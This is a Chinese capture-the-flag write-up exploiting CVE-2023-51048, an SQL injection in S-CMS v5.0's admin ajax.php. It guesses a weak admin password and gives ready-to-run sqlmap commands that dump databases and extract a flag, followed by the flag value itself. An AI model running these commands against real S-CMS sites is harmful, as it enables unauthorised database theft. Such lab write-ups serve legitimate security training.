题目解析
根据题目漏洞说明,S-CMS v5.0 被发现存在SQLI。上网查询相关文章,发现该漏洞描述如下:
S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php.于是直接访问/admin登录。
系统后台登录
启动环境以后,点击访问/admin,需要登录,可以尝试弱口令,发现是admin/admin23。
点击账号管理,添加管理员抓包。
抓包发现如下参数。
sqlmap注入一把梭
发现A_newsauth等四个参数均存在sql注入,这里只跑一个 A_newsauth,存在时间注入
python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbs --batch
查找哪里有flag
python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbms mysql --sql-query "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1"
读取flag内容即可。
python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbms mysql --sql-query "SELECT flag from scms.fllllaaaag"
发现有一位是大写,注错一位,不得不说,受网络问题影响,注入过程是真的费时间还会出现问题。期间注意环境延时,好在可以延时两次,足够跑出来flag了。又重新把注入错误的注入了一次。
python sqlmap.py -r cve-2023-51048.txt -p A_newsauth%5B%5D –randomize=A_login --dbms mysql --sql-query "SELECT substring(flag,17,1) from scms.fllllaaaag"
当然你也可以自己去试,也能试出来是2。
flag最终值
flag{572cef57-6426-4602-ade7-4d2f5b995730}